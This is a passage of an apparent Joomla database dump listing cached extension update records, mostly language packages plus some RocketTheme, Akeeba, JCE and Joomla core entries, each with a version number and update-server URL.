Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27206,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27207,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27208,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27209,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27210,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27211,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27212,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27213,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27214,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27215,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27216,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27217,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27218,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27219,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27220,3,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27221,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27222,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27223,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27224,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27225,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27226,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27227,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27228,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27229,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27230,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27231,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27232,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27233,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27234,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27235,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27236,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27237,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27238,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27239,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27240,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27241,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27242,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27243,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27244,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27245,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27246,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(27247,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(27248,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(27249,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(27250,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(27251,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(27252,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(27253,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(27254,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(27255,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(27256,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27257,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27258,57,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27259,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27260,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27261,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27262,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27263,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27264,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27265,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27266,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27267,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27268,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27269,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27270,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27271,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27272,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27273,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27274,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27275,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27276,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27277,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27278,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27279,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27280,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27281,57,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27282,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27283,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27284,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27285,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27286,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27287,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27288,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27289,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27290,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27291,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27292,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27293,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27294,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27295,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27296,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27297,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27298,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27299,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27300,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27301,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27302,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27303,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27304,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27305,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27306,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27307,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.3','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-3.html',''),(27308,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(27309,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-3.html',''),(27310,129,0,'JCE 2.9.2','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.2','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-2-released',''),(27311,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27312,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27313,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27314,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27315,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27316,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27317,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27318,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27319,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27320,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27321,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27322,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27323,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27324,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27325,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27326,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27327,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27328,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27329,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27330,3,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27331,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27332,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27333,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27334,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27335,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27336,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27337,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27338,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27339,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27340,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27341,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27342,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27343,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27344,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27345,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27346,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27347,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27348,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27349,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27350,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27351,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27352,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27353,3,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27354,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27355,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27356,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27357,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27358,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27359,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27360,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27361,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27362,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27363,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27364,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27365,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27366,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27367,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27368,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27369,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27370,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27371,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27372,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27373,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27374,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27375,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27376,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27377,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27378,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27379,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27380,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(27381,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(27382,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(27383,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(27384,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(27385,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(27386,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(27387,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(27388,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(27389,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(27390,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27391,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27392,57,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27393,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27394,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27395,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27396,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27397,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27398,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27399,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27400,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27401,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27402,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27403,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27404,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27405,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27406,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27407,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27408,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27409,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27410,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27411,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27412,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27413,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27414,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27415,57,0,'English 